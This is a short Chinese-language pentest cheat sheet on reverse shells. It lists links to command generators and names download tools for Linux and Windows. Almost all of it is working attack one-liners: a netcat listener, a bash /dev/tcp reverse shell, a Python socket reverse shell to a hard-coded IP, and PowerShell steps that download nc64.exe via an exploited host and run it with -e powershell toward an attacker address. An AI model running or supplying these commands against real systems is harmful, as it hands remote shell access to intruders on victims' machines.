基础知识-反弹shell

常见渗透命令：

https://blog.csdn.net/weixin_43303273/article/details/83029138

命令生成：

https://forum.ywhack.com/bountytips.php?download

Linux：wget curl python ruby perl java 等

Windows：PowerShell Certutil Bitsadmin msiexec mshta rundll32 等

反弹 shell 命令：

https://forum.ywhack.com/shell.php

常见的：
linux

nc -lvnp 443    //监听443端口

/bin/bash -i >& /dev/tcp/ip/443 0>&1      //linux
Windows:

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

whindows

nc64.exe：https://github.com/vinsworldcom/NetCat64/releases

powershell -c wget ip/nc64.exe -outfile \\programdata\\nc64.exe //通过漏洞上传nc64.exe
\\programdata\\nc64.exe -e powershell ip 443